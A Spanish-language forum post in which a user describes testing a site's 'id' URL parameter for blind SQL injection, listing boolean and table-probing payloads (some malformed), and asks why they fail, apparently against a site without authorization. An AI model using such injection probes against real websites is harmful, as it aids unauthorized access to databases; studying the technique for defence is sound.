Autor
buenas,estuve leyendo algo sobre blind sql inyection.
y me tope con una web similar a ..
ejemplo.com/archivo.php?id=1
Mostraba unas contrataciones ,
al poner..
ejemplo.com/archivo.php?id=1 and 1 = 1 --
Mostraba las contrataciones ,
Al poner..
ejemplo.com/archivo.php?id=1 and 1 = 0 --
No mostraba nada, suponia que habia un blind..
luego intente hacer lo siguiente..
ejemplo.com/archivo.php?id=1 and (Select (*) from admin) --
No mostraba nada..
ejemplo.com/archivo.php?id=1 and (Select (*) from noticias) --
No mostraba nada..
ejemplo.com/archivo.php?id=1 and (Select (*) from mysql) --
tampoco .
probe tambien con cout.
ejemplo.com/archivo.php?id=1 and (Cout(*) from mysql) --
Nada.
Es blind sql inyection, estoy haciendo algo mal?¿ , la pagina que vulnero es una importante bien hecha, no creo que no tenga ninguna de las tablas..
sera un switch ?
saludos.
|
 |
Bienvenido(a), Visitante. Por favor Ingresar o Registrarse ¿Perdiste tu email de activación?. |
En línea
